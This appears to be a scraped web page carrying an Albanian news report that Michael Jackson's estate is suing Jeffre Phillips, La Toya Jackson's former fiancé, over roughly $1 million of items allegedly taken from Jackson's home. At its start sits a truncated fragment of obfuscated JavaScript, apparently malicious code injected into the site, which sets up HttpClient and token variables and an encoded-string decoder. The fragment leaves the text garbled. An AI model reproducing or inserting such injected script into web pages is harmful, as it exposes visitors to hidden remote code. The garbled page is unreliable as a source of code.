;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ngrihet padi ndaj ish të fejuarit të motrës së Michael Jackson

By

Muaj pas pretendimeve se pasuria e Michael Jackson u keqpërdor nga një burrë dikur i fejuar me motrën e madhe të yllit të ndjerë, i cili thuhet se kishte vjedhur pronën e tij, tani po kërkohet në mënyrë zyrtare kthimi i dëmeve të shkaktuara.

Zyrtarët e pasurisë së Jackson, kanë vlerësuar vlerën e pronës së vjedhur në rreth 1 milion dollarë, sipas të dhënave gjyqësore të marra nga TMZ, transmeton Klankosova.tv.

Personi i akuzuar është Jeffre Phillips, i cili ishte në lidhje me La Toya Jackson për vite, dhe sipas padisë ka përfituar nga pikëllimi i familjes në ditët pas vdekjes së MJ për të marrë sendet nga shtëpia e tij në Carolwood.

Duke përshkruar “aktet e pacipë të vjedhjes” të Phillip-it, ata pretendojnë se ai rrëmbeu iPod, shishe pilula me recetë, shënime të shkruara me dorë, pamjet e papublikuara të koncertit dhe “pizhamat që Jackson kishte veshur në orët e fundit të jetës së tij”.

Muaj më parë u tha se Philips kishte kërkuar që gjërat e vjedhura t’i nxjerre në ankand, por diçka e tillë u bllokua me sukses në muajin gusht.

Artikuj të ngjashëm